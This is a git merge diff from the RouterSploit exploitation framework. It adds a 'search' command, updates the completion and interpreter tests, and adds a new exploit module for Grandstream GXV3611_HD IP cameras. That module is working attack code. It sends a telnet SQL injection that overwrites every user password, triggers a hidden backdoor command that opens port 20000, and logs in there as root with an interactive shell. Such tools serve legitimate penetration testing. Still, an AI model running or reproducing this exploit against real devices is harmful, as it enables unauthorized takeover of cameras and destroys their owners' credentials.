Merge branch 'jabedude-master'

routersploit/interpreter.py

@@ -159,6 +159,7 @@ class RoutersploitInterpreter(BaseInterpreter):
     help                        Print this help menu
     use <module>                Select a module for usage
     exec <shell command> <args> Execute a command in a shell
+    search <search term>        Search for appropriate module
     exit                        Exit RouterSploit"""
 
     module_help = """Module commands:
@@ -180,7 +181,7 @@ class RoutersploitInterpreter(BaseInterpreter):
         self.prompt_hostname = 'rsf'
         self.show_sub_commands = ('info', 'options', 'devices', 'all', 'creds', 'exploits', 'scanners')
 
-        self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show '])
+        self.global_commands = sorted(['use ', 'exec ', 'help', 'exit', 'show ', 'search '])
         self.module_commands = ['run', 'back', 'set ', 'setg ', 'check']
         self.module_commands.extend(self.global_commands)
         self.module_commands.sort()
@@ -456,5 +457,11 @@ class RoutersploitInterpreter(BaseInterpreter):
     def command_exec(self, *args, **kwargs):
         os.system(args[0])
 
+    def command_search(self, *args, **kwargs):  # TODO cover with unit tests
+        for arg in args:
+            matches = [s for s in self.modules if arg in s]
+        for match in matches:
+            utils.print_info(match.replace('.', '/'))
+
     def command_exit(self, *args, **kwargs):
         raise EOFError

routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py

+import telnetlib
+
+from routersploit import (
+    exploits,
+    mute,
+    print_error,
+    print_success,
+)
+
+
+class Exploit(exploits.Exploit):
+    __info__ = {
+        'name': 'Grandsteam GXV3611_HD - SQL Injection',
+        'description': 'Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. '
+                       'After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it',
+        'authors': [
+            'pizza1337',       # exploit author
+            'Joshua Abraham',  # routesploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/40441/',
+            'http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html',
+        ],
+        'devices': [
+            'Grandstream GXV3611_HD',
+        ],
+    }
+
+    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')  # target address
+    port = exploits.Option(23, 'Target port')  # default port
+
+    def run(self):
+        if self.check():
+            print_success("Target appears to be vulnerable...")
+
+            try:
+                conn = telnetlib.Telnet(self.target, self.port)
+                conn.read_until("Username: ")
+                conn.write("';update user set password='a';--\r\n")  # This changes all the passwords to 'a'
+                conn.read_until("Password: ")
+                conn.write("nothing\r\n")
+                conn.read_until("Username: ")
+                conn.write("admin\r\n")
+                conn.read_until("Password: ")
+                conn.write("a\r\n")  # Login with the new password
+                conn.read_until("> ")
+                conn.write("!#/ port lol\r\n")  # Backdoor command triggers telnet server to startup.
+                conn.read_until("> ")
+                conn.write("quit\r\n")
+                conn.close()
+                print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
+            except:
+                print_error("Exploit failed. Could not log in.")
+
+            try:
+                conn = telnetlib.Telnet(self.target, 20000)
+                conn.read_until("login: ")
+                conn.write("root\r\n")
+                conn.read_until("Password: ")
+                conn.write("\r\n")
+                conn.read_until("# ")
+                print_success("Authenticaiton Successful")
+                conn.interact()
+            except:
+                print_error("Failed to log into backdoor.")
+        else:
+            print_error("Exploit failed. Target does not appear vulnerable")
+
+    @mute
+    def check(self):
+        try:
+            conn = telnetlib.Telnet(self.target, self.port)
+        except Exception:
+            return False
+        else:
+            return 'Grandstream' in conn.read_until("login:")

routersploit/test/test_completer.py

@@ -32,7 +32,7 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
 
     def test_raw_commands_no_module(self):
         self.rsf.send("\t\t")
-        self.assertPrompt('exec   exit   help   show   use    \r\n', self.raw_prompt)
+        self.assertPrompt('exec     exit     help     search   show     use      \r\n', self.raw_prompt)
 
     def test_complete_use_raw(self):
         self.rsf.send("u\t\t")
@@ -89,7 +89,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
         self.set_module()
         self.rsf.send("\t\t")
         self.assertPrompt(
-            '  exec   exit   help   run    set    setg   show   use    \r\n',
+            'back     exec     help     search   setg     use      \r\n'
+            'check    exit     run      set      show     \r\n',
             self.module_prompt('FTP Bruteforce')
         )
 
@@ -117,20 +118,28 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
             'run'
         )
 
+    def test_complete_search(self):
+        self.set_module()
+        self.rsf.send("sea\t")
+        self.assertPrompt(
+            self.module_prompt('FTP Bruteforce'),
+            'search ',
+        )
+
     def test_complete_set_raw(self):
         self.set_module()
         self.rsf.send("s\t\t")
         self.assertPrompt(
-            'set    setg   show   \r\n',
+            'search   set      setg     show     \r\n',
             self.module_prompt('FTP Bruteforce')
         )
 
     def test_complete_set_raw_2(self):
         self.set_module()
-        self.rsf.send("se\t")
+        self.rsf.send("se\t\t")
         self.assertPrompt(
+            'search   set      setg     \r\n',
             self.module_prompt('FTP Bruteforce'),
-            'se\at',
         )
 
     def test_complete_set_raw_3(self):
@@ -145,7 +154,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
         self.set_module()
         self.rsf.send("set \t\t")
         self.assertPrompt(
-            'passwords        stop_on_success  threads          verbosity\r\nport             target           usernames        \r\n',
+            'passwords        stop_on_success  threads          verbosity\r\n'
+            'port             target           usernames        \r\n',
             self.module_prompt('FTP Bruteforce'),
             'set ',
         )
@@ -162,7 +172,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
         self.set_module()
         self.rsf.send("setg \t\t")
         self.assertPrompt(
-            'passwords        stop_on_success  threads          verbosity\r\nport             target           usernames        \r\n',
+            'passwords        stop_on_success  threads          verbosity\r\n'
+            'port             target           usernames        \r\n',
             self.module_prompt('FTP Bruteforce'),
             'setg ',
         )
@@ -182,7 +193,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
         self.set_module()
         self.rsf.send("\t\t")
         self.assertPrompt(
-            "  exec   exit   help   run    set    setg   show   use    \r\n",
+            "back     exec     help     search   setg     use      \r\n"
+            "check    exit     run      set      show     \r\n",
             self.module_prompt('FTP Bruteforce'),
         )
 
@@ -194,7 +206,8 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
         self.rsf.send("setg target foo\r\n")
         self.rsf.send("\t\t")
         self.assertPrompt(
-            '  use      \r\ncheck    exit     run      setg     unsetg   \r\n',
+            'back     exec     help     search   setg     unsetg   \r\n'
+            'check    exit     run      set      show     use      \r\n',
             self.module_prompt('FTP Bruteforce'),
         )
 

routersploit/test/test_interpreter.py

@@ -256,21 +256,21 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
     def test_suggested_commands_with_loaded_module_and_no_global_value_set(self):
         self.assertEqual(
             list(self.interpreter.suggested_commands()),
-            ['back', 'check', 'exec ', 'exit', 'help', 'run', 'set ', 'setg ', 'show ', 'use ']  # Extra space at the end because of following param
+            ['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', 'set ', 'setg ', 'show ', 'use ']  # Extra space at the end because of following param
         )
 
     def test_suggested_commands_with_loaded_module_and_global_value_set(self):
         GLOBAL_OPTS['key'] = 'value'
         self.assertEqual(
             list(self.interpreter.suggested_commands()),
-            ['back', 'check', 'exec ', 'exit', 'help', 'run', 'set ', 'setg ', 'show ', 'unsetg ', 'use ']  # Extra space at the end because of following param
+            ['back', 'check', 'exec ', 'exit', 'help', 'run', 'search ', 'set ', 'setg ', 'show ', 'unsetg ', 'use ']  # Extra space at the end because of following param
         )
 
     def test_suggested_commands_without_loaded_module(self):
         self.interpreter.current_module = None
         self.assertEqual(
             self.interpreter.suggested_commands(),  # Extra space at the end because of following param
-            ['exec ', 'exit', 'help', 'show ', 'use ']
+            ['exec ', 'exit', 'help', 'search ', 'show ', 'use ']
         )
 
     @mock.patch('importlib.import_module')